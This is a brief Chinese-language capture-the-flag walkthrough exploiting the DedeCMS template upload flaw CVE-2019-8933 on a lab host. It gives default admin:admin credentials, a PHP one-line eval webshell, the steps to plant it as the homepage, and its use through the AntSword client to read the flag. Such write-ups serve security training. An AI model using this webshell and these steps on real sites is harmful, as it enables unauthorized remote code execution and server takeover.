dedecms 文件上传(CVE-2019-8933)
- 访问漏洞的ip,点击uploads进入页面
- 输入IP地址(10.9.47.6:27988/uploads/dede)进入后台
- 账户名和密码admin:admin登录
- 选择模板——默认模板管理——新建模板
- 在内容中输入后门代码(一句话木马)<?php @eval($_REQUEST[777]);?>,点击保存
- 点击生成——更新主页HTML——主页位置——选择主页模板(浏览选择一句话木马文件)——首页模式——更新主页HTML
- 选择浏览,地址是(10.9.47.6:27988/uploads/index.php),发现空白网页,说明上传成功
- 用蚁剑添加数据,上传成功
- 然后打开虚拟终端,输入命令 dir/ tmp命令,成功拿到falg